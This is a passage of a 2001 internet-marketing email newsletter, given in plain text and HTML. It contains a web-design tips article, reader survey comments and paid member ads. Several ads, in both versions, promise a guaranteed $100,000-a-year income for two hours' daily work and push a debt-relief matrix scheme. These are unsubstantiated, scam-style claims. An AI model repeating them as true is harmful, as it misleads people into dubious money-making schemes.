 $100,000+p.a. - working just 2 hours a day. GUARANTEED 
 http://www.ArmchairTycoon.com/profits2you
 Trade Links - mailto:walter@profits2you.com
 ---------------------------------------------------------------------
 CashPO is Paid E-Mail Central!
 Get FREE REFERRALS, _KEEP_ referrals when new
 programs are added; free advertising to other
 members, and soon chances to win cash!
 http://www.cashpo.net/CashPO/openpage.php4?c=2
 ---------------------------------------------------------------------
 JUST BEEN RELEASED!!
 Internet Marketing guru Corey Rudl has just released a BRAND NEW
 VERSION of his #1 best-selling Internet Marketing Course,"The Insider
 Secret's to Marketing Your Business on the Internet". A MUST HAVE!
 So don't hesitate, visit.. http://www.adminder.com/c.cgi?start&amp;bgmlmezine
 -------------------------------------------------------------- 
   If you have a product, service, opportunity or quality 
   merchandise that appeals to people worldwide, reach your 
   targeted audience! For a fraction of what other large 
   newsletters charge you can exhibit your website here, and 
   trade links for only $8 CPM. Compare that to the 
   industry average of $10-$15 CPM. Why?... Because as a 
   valuable member we want you to be successful! Order today - 
   Showcases are limited and published on a first come, first 
   serve basis. For our secure order form, click here: 
   http://bannersgomlm.com/ezine 
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Commentary Quick Tips
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Product Recommendation:
 If you don't have a fax machine, or your phone, computer, 
 and fax all share the same line, you should check out 
 http://www.efax.com.  You can get a unique phone number and 
 receive faxes and voicemail sent to you via email, all 
 totally free.  It's been a life saver for me.
 Submitted by JT Timmer
 Animal_Instincts@RagingBull.com
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Do you have a marketing hint, product recommendation, or
 online gem of wisdom you'd like to share with your fellow
 subscribers? With your 2 - 10 line Quick Tip include your
 name and URL or email address and  we'll give you credit
 for your words of wisdom.
 And, if you're looking for free advertising, this isn't
 the place - check out the 'One Question Survey' below for
 a great free advertising offer.
 Send it in to mailto:Submit@AEOpublishing.com
 with 'Quick Tip' in the Subject block.
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Win A FREE Ad In Community &amp; Commentary
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 To keep this interesting, how about this, every month we'll 
 draw a name from the replies and that person will win one 
 Sponsorship Showcase in the Community &amp; Commentary, for FREE. 
 That's a value of over $800.00! Respond to each weekly survey, 
 and increase your chances to win with four separate entries. 
  QUESTION OF THE WEEK (07/27/01)...
  No right or wrong answers, and just by answering
  you are entered to win a Sponsorship Showcase  - Free!
  ~~~ Are you concerned about identity theft online? ~~~
 yes   mailto:yes@AEOpublishing.com
 no    mailto:no@AEOpublishing.com
 To make this as easy as possible for you, just click on the
 hyperlinked answer to send us an e-mail  - you do not need to
 enter any information in the subject or body of the message.
 ** ADD YOUR COMMENTS!  Follow directions above and
 add your comments in the body of the message, and we'll
 post the best commentaries along with the responses.
 You will automatically be entered in our drawing for a free
 Sponsorship ad in the Community &amp; Commentary. Please
 respond only one time per question.  Multiple responses
 from the same individual will be discarded.
 Last Weeks's Survey Results &amp; Comments  (07/20/01)
  ~~~ Do you promote your website only online? ~~~
 yes   45%
 no    55%
 Comments:
 ~~~~~~~~~
 "Just because we're working online doesn't mean we should forget
 to market offline as well.  Heck,some days I get more leads in the 
 supermarket than I do online."
 -- Henry C.  http://www.fastersurfing.com
 ~~~~~~~~~
 "I attach mailing labels with my message printed on them on the 
 back of my business cards, on flyers, brochures or anything that 
 I hand out to my customers."
 -- Rick A.   http://www.iprocenter.com/rickarmstrong  
 ~~~~~~~~~
 "I promote my business opportunity website both online and 
 offline. The printed media is very valuable to promote my presence 
 on the internet. Having a website is just like having a "sign-post 
 in the desert". Without anyone knowing where to look to find you, 
 your website is a museum with no visitors.
 -- Jerry P.    http://www.wealthtoday.net/key4health
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 To change your subscribed address, send both new and old 
 address to mailto:Submit@AEOpublishing.com 
 See the link (below) for our Subscription Center to unsubscribe 
 or edit your interests. 
 Please send suggestions and comments to: 
 mailto:Editor@AEOpublishing.com 
 I invite you to send your real successes and showcase 
 your strategies and techniques, or yes, even your total bombs, 
 "Working Together We Can All Prosper." 
 mailto:Submit@AEOpublishing.com 
 For information on how to sponsor Your Membership 
 Community &amp; Commentary visit: http://bannersgomlm.com/ezine 
 Copyright 2001 AEOpublishing.com 
 ------------------------------------------------
 web: http://www.AEOpublishing.com
 ------------------------------------------------
 This email has been sent to jm@netnoteinc.com at your 
 request, by Your Membership Newsletter Services.
 Visit our Subscription Center to edit your interests or unsubscribe.
 http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.l89m7847&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com
 View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp
 Powered by 
 Constant Contact(R)
 www.constantcontact.com
 --261908501.996294421526.JavaMail.RovAdmin.rovweb003
 Content-Type: text/html; charset=iso-8859-1
 &lt;HTML&gt;
 &lt;!-- 
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;HTML-FORMATTED MESSAGE BELOW
 The remainder of this message is in HTML format for use by email
 clients that can properly display it.   If you are seeing this message,
 it is because your email client cannot properly display HTML.  You can
 ignore the HTML code you will see below.
  --&gt;
 &lt;head&gt;
 	&lt;title&gt;Your Membership Community &amp; Commentary, 07-27-01&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;IMG SRC="http://ccprod.roving.com/roving/sa/o.jsp?id=bd7n7877.l89m7847&amp;o=http://ccprod.roving.com/roving/images/p1x1.gif" WIDTH=1 HEIGHT=1 alt=" "&gt;
 &lt;!--  Do NOT delete previous line if you want to get statistics on the number of opened emails  --&gt;
 &lt;center&gt;
 &lt;table border="1" bordercolor="#003366" cellpadding="0" cellspacing="0" width="610"&gt;
 &lt;tr&gt;
 	&lt;td&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
 &lt;!-- Begin Logo Include --&gt;
 &lt;!-- START CONDITIONAL HTML HIDING 
 &lt;tr&gt;
 	&lt;td colspan="2" align="center"&gt;&lt;img src="" border="0" alt="Your Membership Newsletter Services"&gt;&lt;/td&gt;
 &lt;/tr&gt;
  END OF CONDITIONAL HTML HIDING --&gt; 
 &lt;!-- End Logo Include --&gt;
 &lt;tr&gt;
 	&lt;td colspan="2" align="center" valign="middle" bgcolor="#668ABE" height="60"&gt;&lt;font face="Georgia,'Times New Roman',Times,serif" size="6" color="#ffffff"&gt;Your Membership Community &amp; Commentary&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td align="left"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;It's All About Making Money&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td align="right"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;July 27, 2001&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;
 	&lt;td width="190" bgcolor="#EEEEDF" align="center" valign="top"&gt;
 	&lt;!-- Begin Table of Contents Header Table --&gt;
 		&lt;table border="1" bordercolor="#003366" cellpadding="2" cellspacing="0" width="190"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" align="center" valign="top"&gt;
 			&lt;font face="Georgia,'Times New Roman',Times,serif" size="3" color="#003366"&gt;
 			&lt;b&gt;in this issue&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;!-- End Table of Contents Header Table --&gt;
 	&lt;!-- Begin Article Headlines Table --&gt;
 		&lt;table border="0" cellpadding="2" cellspacing="0" width="190"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#DBE8F4" align="center" valign="top"&gt;
 			&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;
 			&lt;br&gt;&lt;a href="#article1"&gt;5 Ways to Create a Unique Website&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article2"&gt;Member Showcase&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article3"&gt;Commentary Quick Tips&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article4"&gt;Win A FREE Ad In Community &amp; Commentary&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article5"&gt;&lt;/a&gt;
 		    &lt;br&gt;&lt;br&gt;&lt;/font&gt;
 		    &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" align="center" valign="top"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
     &lt;!-- End Article Headlines Table --&gt;
     &lt;!-- PROMOTION START --&gt;
 		&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;
 		&lt;br&gt;&lt;b&gt;Today's Special Announcement:&lt;/b&gt;&lt;br&gt;
 		&lt;!-- Promotion Image --&gt;
 		&lt;br&gt;
 		&lt;p&gt;Absolute Gifts Etc. Offers thousand of high quality gifts &amp;amp; unique
 &lt;br&gt;collectibles. At wholesales prices, Some items are "Exclusive" and
 &lt;br&gt;were designed for our collection only. Lots of freebees!
 &lt;br&gt;Plus bonus bucks will save you even more.
 &lt;br&gt;Business opportunities,Total weight loss system &amp;amp; much more!
 &lt;br&gt;&lt;a href="http://www.absolutegiftsetc.com"&gt;www.absolutegiftsetc.com&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;&lt;p&gt;
 &lt;br&gt;&amp;nbsp;&lt;p&gt;
 You are a member in at least one of these programs 
 - You should be in them all! &lt;br&gt;
 &lt;a href="http://www.BannersGoMLM.com"&gt; BannersGoMLM.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.ProfitBanners.com"&gt; ProfitBanners.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.CashPromotions.com"&gt; CashPromotions.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MySiteInc.com"&gt; MySiteInc.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.TimsHomeTownStories.com"&gt; TimsHomeTownStories.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.FreeLinksNetwork.com"&gt; FreeLinksNetwork.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MyShoppingPlace.com"&gt; MyShoppingPlace.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.BannerCo-op.com"&gt; BannerCo-op.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.com"&gt; PutPEEL.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.net"&gt; PutPEEL.net &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SELLinternetACCESS.com"&gt; SELLinternetACCESS.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.Be-Your-Own-ISP.com"&gt; Be-Your-Own-ISP.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SeventhPower.com"&gt; SeventhPower.com &lt;/a&gt;&lt;p&gt;
         &lt;br&gt;&lt;br&gt;
 		&lt;/font&gt;
     &lt;!-- PROMOTION END --&gt;
 	&lt;/td&gt;
 	&lt;td rowspan="2" width="420" valign="top"&gt;
 	&lt;!-- Begin Greeting and Intro paragraph --&gt;
 		&lt;table border="0" cellpadding="2" cellspacing="0" width="100%"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;/td&gt;
 			&lt;td bgcolor="#ffffff" valign="top"&gt;
             &lt;font size="2" face="Verdana,Arial,Helvetica"&gt;
             &lt;b&gt;&lt;/b&gt;
 			&lt;br&gt;Information to provide you with the absolute 
 &lt;br&gt;best low and no cost ways of providing traffic 
 &lt;br&gt;to your site, helping you to capitalize on the power &lt;br&gt;and potential the web brings to every Net-Preneur. &lt;br&gt;
 --- This Issue Contains Sites Who Will Trade Links With You! --- &lt;br&gt;
 			&lt;br&gt;&lt;br&gt;&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" colspan="2" height="3" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" colspan="2" height="2" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#003366" colspan="2" height="2" valign="bottom"&gt; &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;!-- End Greeting and Intro paragraph --&gt;
 	&lt;!-- Begin Article Table --&gt;
 		&lt;table border="0" cellpadding="4" cellspacing="0" width="100%"&gt;
          &lt;tr&gt;&lt;td bgcolor="#ffffff" colspan="2" valign="top"&gt;&lt;a name="article1"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;5 Ways to Create a Unique Website&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#ffffff" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;Internet users have no doubt seen several websites of
 &lt;br&gt;identical design. This is often because webmasters do not
 &lt;br&gt;have the ability or time to design and create unique websites.
 &lt;br&gt;These five points will help you come up with a one-of-a-kind
 &lt;br&gt;design for your website.
 &lt;p&gt;1. Navigation System
 &lt;p&gt;Deciding on a navigation system should be one of the first
 &lt;br&gt;things to consider when designing your website. Visitors
 &lt;br&gt;usually look for a way to get to the information they want
 &lt;br&gt;before reading anything else. I would suggest putting your
 &lt;br&gt;navigation system in two areas. Look at WebmasterBase
 &lt;br&gt;(&lt;a href="http://www.webmasterbase.com"&gt;http://www.webmasterbase.com&lt;/a&gt;)
 for example. There is a list
 &lt;br&gt;of categories on the left, and information about the network
 &lt;br&gt;on the top bar.
 &lt;p&gt;It is not recommended that you place your navigation at the
 &lt;br&gt;bottom of the page because:
 &lt;p&gt;- People see the top of the page first
 &lt;br&gt;- If you have a lot of content on one page, the navigation
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; gets pushed to bottom of the page... away from the
 visitor.
 &lt;p&gt;2. Color Scheme
 &lt;p&gt;When you are choosing colors, make sure they contrast.
 &lt;br&gt;For example, do not use bright green and florescent pink.
 &lt;br&gt;Some colors that are often used are white on black or black
 &lt;br&gt;on white.
 &lt;p&gt;A wonderful utility that is web-based and free is Color
 &lt;br&gt;Schemer (&lt;a href="http://www.godigitalstudios.com/www/color/"&gt;http://www.godigitalstudios.com/www/color/&lt;/a&gt;),
 &lt;br&gt;created by Aaron Epstein. Many other programs exist that
 &lt;br&gt;can assist you in choosing colors. Try doing a search on
 &lt;br&gt;FreewareFiles (&lt;a href="http://www.freewarefiles.com"&gt;http://www.freewarefiles.com&lt;/a&gt;),
 Tucows
 &lt;br&gt;(&lt;a href="http://www.tucows.com"&gt;http://www.tucows.com&lt;/a&gt;), or Download.com
 &lt;br&gt;(&lt;a href="http://www.download.com"&gt;http://www.download.com&lt;/a&gt;) for
 "color schemer."
 &lt;p&gt;3. Content Window
 &lt;p&gt;This is the brain of the website. Make sure that the text
 &lt;br&gt;here is easy to read and understand.
 &lt;p&gt;Also, provide your own original content. People do not want
 &lt;br&gt;to hear what somebody else has to say. They want to hear
 &lt;br&gt;what &lt;i&gt;you&lt;/i&gt; want to say! While it might be time consuming to
 &lt;br&gt;write your own content, it sure is worth it.
 &lt;p&gt;To find content for your website, try searching at
 &lt;br&gt;EzineArticles (&lt;a href="http://www.ezinearticles.com"&gt;http://www.ezinearticles.com&lt;/a&gt;).
 Other people
 &lt;br&gt;may have used the articles, but if you become good friends
 &lt;br&gt;with the authors, they may send you new content as they
 &lt;br&gt;write it. Be careful though. Do not use too much content
 &lt;br&gt;from other authors, as mentioned above.
 &lt;p&gt;4. Font(s)
 &lt;p&gt;Several types of fonts exist. The first one I will discuss is
 &lt;br&gt;fixed width or monospace, similar to Courier or Courier New.
 &lt;br&gt;Fixed width fonts are good for displaying code (like HTML.)
 &lt;p&gt;Another type of font is called sans serif. It is similar to
 &lt;br&gt;Arial (Windows) or Helvetica (Macintosh). This font can
 &lt;br&gt;be used for long pieces of text.
 &lt;p&gt;The final type of font is called serif because it has serifs,
 &lt;br&gt;or curves, in each letter. Often, this font is called Times
 &lt;br&gt;(Windows) or Georgia (Macintosh). This font, like sans serif,
 &lt;br&gt;is often used for long blocks of text. It is preferred because
 &lt;br&gt;its rounded edges lead the reader to the next letter, making
 &lt;br&gt;it easier to read.
 &lt;p&gt;5. Advertising
 &lt;p&gt;Ah, everybody's favorite... advertising! This is one of thing
 &lt;br&gt;that almost every website has. The most common type is
 &lt;br&gt;what is known as "banner" advertising. It is called that
 &lt;br&gt;because it is long and thin (like a paper banner.) How long
 &lt;br&gt;you ask? The generic kind is 468 pixels wide by 60 pixels high.
 &lt;p&gt;New sizes however are being used. Take for example the
 &lt;br&gt;new style called "skyscraper" -- so called for a reason: it
 &lt;br&gt;looks like a skyscraper. It is tall (about 425 pixels) but not
 &lt;br&gt;too wide (about 100-125 pixels.)
 &lt;p&gt;Finding a way to place advertising can be tricky. Banners
 &lt;br&gt;used to be placed (and still are) only at the top of the
 &lt;br&gt;page.&amp;nbsp; Nevertheless, banners are starting to be placed in
 &lt;br&gt;the middle of the page, at the bottom, or along the side.
 &lt;p&gt;Conclusion
 &lt;p&gt;These are only five things to consider when designing a
 &lt;br&gt;website. There are many others however. Let me know
 &lt;br&gt;what you find that helps you create a unique website. My
 &lt;br&gt;email address is mailto:corbb@justforwebmasters.com.
 &lt;p&gt;-------------------------------------
 &lt;br&gt;About the Author...
 &lt;p&gt;Written by Corbb O'Connor. Corbb is the Webmaster of
 &lt;br&gt;&lt;a href="http://www.justforwebmasters.com"&gt;http://www.justforwebmasters.com&lt;/a&gt;,
 a website that focuses
 &lt;br&gt;on teaching Webmasters how to create, gain traffic to, and
 &lt;br&gt;make money from their own websites. He is also the editor
 &lt;br&gt;of a FREE bi-weekly newsletter entitled, "The Guided
 &lt;br&gt;Webmaster." To subscribe now, send an email to:
 &lt;br&gt;&lt;a href="mailto:subscribe@justforwebmasters.com?subject=article-subscribe"&gt;mailto:subscribe@justforwebmasters.com?subject=article-subscribe&lt;/a&gt;.
 &lt;br&gt;Information about this newsletter can be obtained from his website.&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
          &lt;tr&gt;&lt;td bgcolor="#DBE8F4" colspan="2" valign="top"&gt;&lt;a name="article2"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Member Showcase&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;&lt;i&gt;Examine carefully - Those with email addresses included WILL&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;TRADE LINKS with you... You are encouraged to contact them.&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;There Are Many Ways To Build A Successful Business - Just look &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;at these successful sites &amp;amp; programs other members are involved
 in...&lt;/i&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Life Without Debt! What would you do with 5,000 10,000
 &lt;br&gt;20,000 100,000? A "Dream Team" of heavy hitters are
 &lt;br&gt;gathering to promote Life Without Debt. Get in NOW to
 &lt;br&gt;receive Massive spillover in the 2x matrix.
 &lt;br&gt;&lt;a href="http://trafficentral.com/lwd/index.htm"&gt;http://trafficentral.com/lwd/index.htm&lt;/a&gt;
 &lt;br&gt;---------------------------------------------------------------------
 &lt;p&gt;EARN $100,000+ PER YEAR! - FULLY GUARANTEED!
 &lt;br&gt;We do all the selling for you, 365 days a year!
 &lt;br&gt;We also offer you a GUARANTEED INCOME of up to
 &lt;br&gt;$100,000+p.a. - working just 2 hours a day. GUARANTEED
 &lt;br&gt;&lt;a href="http://www.ArmchairTycoon.com/profits2you"&gt;http://www.ArmchairTycoon.com/profits2you&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:walter@profits2you.com"&gt;mailto:walter@profits2you.com&lt;/a&gt;
 &lt;br&gt;---------------------------------------------------------------------
 &lt;p&gt;CashPO is Paid E-Mail Central!
 &lt;br&gt;Get FREE REFERRALS, _KEEP_ referrals when new
 &lt;br&gt;programs are added; free advertising to other
 &lt;br&gt;members, and soon chances to win cash!
 &lt;br&gt;&lt;a href="http://www.cashpo.net/CashPO/openpage.php4?c=2"&gt;http://www.cashpo.net/CashPO/openpage.php4?c=2&lt;/a&gt;
 &lt;br&gt;---------------------------------------------------------------------
 &lt;p&gt;JUST BEEN RELEASED!!
 &lt;br&gt;Internet Marketing guru Corey Rudl has just released
 &lt;br&gt;a BRAND NEW VERSION of his #1 best-selling Internet
 &lt;br&gt;Marketing Course,"The Insider Secret's to Marketing Your
 &lt;br&gt;Business on the Internet". A MUST HAVE! So don't
 &lt;br&gt;hesitate, visit.. &lt;a href="http://www.adminder.com/c.cgi?start&amp;bgmlmezine"&gt;http://www.adminder.com/c.cgi?start&amp;amp;bgmlmezine&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;&lt;i&gt;If you have a product, service, opportunity or quality &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;merchandise that appeals to people worldwide, reach your targeted audience!&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;For a fraction of what other large newsletters charge you can &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;exhibit your website here, and trade links for only $8 CPM.&amp;nbsp; &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Compare that to the industry average of $10-$15 CPM. 
 &lt;br&gt;Why?... Because as a valuable member we want you &lt;/i&gt;
 &lt;br&gt;&lt;i&gt;to be successful! Order today -&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Showcases are limited and published on a first come, first serve
 basis.&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;For our secure order form, click here:&lt;/i&gt; &lt;a href="http://bannersgomlm.com/ezine"&gt;http://bannersgomlm.com/ezine&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
 		 &lt;tr&gt;&lt;td bgcolor="#FFFFFF" colspan="2" valign="top"&gt;&lt;a name="article3"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Commentary Quick Tips&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFFFFF" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#FFFFFF" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;Product Recommendation:
 &lt;p&gt;If you don't have a fax machine, or your phone, computer,
 &lt;br&gt;and fax all share the same line, you should check out
 &lt;br&gt;&lt;a href="http://www.efax.com"&gt;http://www.efax.com&lt;/a&gt;.&amp;nbsp; You can
 get a unique phone number
 &lt;br&gt;and receive faxes and voicemail sent to you via email, all
 &lt;br&gt;totally free.&amp;nbsp; It's been a life saver for me.
 &lt;p&gt;Submitted by JT Timmer
 &lt;br&gt;Animal_Instincts@RagingBull.com
 &lt;br&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 &lt;p&gt;Do you have a marketing hint, product recommendation, or
 &lt;br&gt;online gem of wisdom you'd like to share with your fellow
 &lt;br&gt;subscribers? With your 2 - 10 line Quick Tip include your
 &lt;br&gt;name and URL or email address and&amp;nbsp; we'll give you credit
 &lt;br&gt;for your words of wisdom.
 &lt;p&gt;And, if you're looking for free advertising, this isn't
 &lt;br&gt;the place - check out the 'One Question Survey' below for
 &lt;br&gt;a great free advertising offer.
 &lt;p&gt;Send it in to &lt;a href="mailto:Submit@AEOpublishing.com"&gt;mailto:Submit@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;with 'Quick Tip' in the Subject block.&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
 		 &lt;tr&gt;&lt;td bgcolor="#DBE8F4" colspan="2" valign="top"&gt;&lt;a name="article4"&gt;&lt;/a&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;li&gt;&lt;b&gt;Win A FREE Ad In Community &amp; Commentary&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;/td&gt;&lt;td bgcolor="#DBE8F4" valign="top"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica"&gt;&lt;p&gt;To keep this interesting, how about this, every month we'll
 &lt;br&gt;draw a name from the replies and that person will win one
 &lt;br&gt;Sponsorship Showcase in the Community &amp;amp; Commentary, for FREE.
 &lt;br&gt;That's a value of over $800.00! Respond to each weekly survey,
 &lt;br&gt;and increase your chances to win with four separate entries.
 &lt;p&gt;&amp;nbsp;QUESTION OF THE WEEK (07/27/01)...
 &lt;br&gt;&amp;nbsp;No right or wrong answers, and just by answering
 &lt;br&gt;&amp;nbsp;you are entered to win a Sponsorship Showcase&amp;nbsp; - Free!
 &lt;p&gt;&amp;nbsp;~~~ Are you concerned about identity theft online? ~~~
 &lt;p&gt;yes&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="mailto:yes@AEOpublishing.com"&gt;mailto:yes@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;no&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="mailto:no@AEOpublishing.com"&gt;mailto:no@AEOpublishing.com&lt;/a&gt;
 &lt;p&gt;To make this as easy as possible for you, just click on the
 &lt;br&gt;hyperlinked answer to send us an e-mail&amp;nbsp; - you do not need to
 &lt;br&gt;enter any information in the subject or body of the message.
 &lt;p&gt;** ADD YOUR COMMENTS!&amp;nbsp; Follow directions above and
 &lt;br&gt;add your comments in the body of the message, and we'll
 &lt;br&gt;post the best commentaries along with the responses.
 &lt;p&gt;You will automatically be entered in our drawing for a free
 &lt;br&gt;Sponsorship ad in the Community &amp;amp; Commentary. Please
 &lt;br&gt;respond only one time per question.&amp;nbsp; Multiple responses
 &lt;br&gt;from the same individual will be discarded.
 &lt;p&gt;Last Weeks's Survey Results (07/20/01)
 &lt;p&gt;&amp;nbsp;~~~ Do you promote your website only online? ~~~
 &lt;p&gt;yes&amp;nbsp;&amp;nbsp; 45%
 &lt;br&gt;no&amp;nbsp;&amp;nbsp;&amp;nbsp; 55%
 &lt;p&gt;Comments:
 &lt;br&gt;~~~~~~~~~
 &lt;p&gt;"Just because we're working online doesn't mean we should
 &lt;br&gt;forget to market offline as well.&amp;nbsp; Heck, some days I get more
 &lt;br&gt;leads in the supermarket than I do online."
 &lt;br&gt;-- Henry C.&amp;nbsp; &lt;a href="http://www.fastersurfing.com"&gt;http://www.fastersurfing.com&lt;/a&gt;
 &lt;br&gt;~~~~~~~~~
 &lt;p&gt;"I attach mailing labels with my message printed on them
 &lt;br&gt;on the back of my business cards, on flyers, brochures or
 &lt;br&gt;anything that I hand out to my customers."
 &lt;br&gt;-- Rick A.&amp;nbsp;&amp;nbsp; &lt;a href="http://www.iprocenter.com/rickarmstrong"&gt;http://www.iprocenter.com/rickarmstrong&lt;/a&gt;
 &lt;br&gt;~~~~~~~~~
 &lt;p&gt;"I promote my business opportunity website both online
 &lt;br&gt;and offline. The printed media is very valuable to promote
 &lt;br&gt;my presence on the internet. Having a website is just like
 &lt;br&gt;having a "sign-post in the desert". Without anyone
 &lt;br&gt;knowing where to look to find you, your website is a
 &lt;br&gt;museum with no visitors.
 &lt;br&gt;-- Jerry P.&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="http://www.wealthtoday.net/key4health"&gt;http://www.wealthtoday.net/key4health&lt;/a&gt;&lt;br&gt;&lt;p&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#003366" colspan="2" valign="bottom"&gt; &lt;/td&gt;&lt;/tr&gt; 
